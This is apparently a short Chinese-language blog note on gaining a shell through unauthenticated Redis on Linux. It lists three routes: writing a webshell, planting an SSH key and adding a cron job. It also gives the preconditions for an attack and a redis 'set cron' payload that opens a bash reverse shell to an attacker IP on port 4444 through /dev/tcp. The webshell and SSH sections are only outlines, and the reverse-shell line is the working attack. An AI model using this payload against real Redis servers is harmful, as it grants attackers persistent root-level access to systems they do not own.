🗒️redis未授权getshell
2022-8-7
| 2023-10-29
字数 310阅读时长 1 分钟
type
status
date
slug
summary
tags
category
icon
password

linux(三种)

一. 写入webshell

前提条件

1.靶机redis链接未授权,在攻击机上能用redis-cli连上,如上图,并未登陆验证
2.开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限

利用思路

二. 写入ssh私钥

ssh-keygen -t rsa

三. 写入反弹shell到计划任务的目录下执行

在/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,我们把反弹shell写入root的定时任务中。
set cron "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.239.141/4444 0>&1\n\n"
 
  • 漏洞复现
  • fastjson 1.2.47-rcelog4j2 JNDI注入漏洞
    Loading...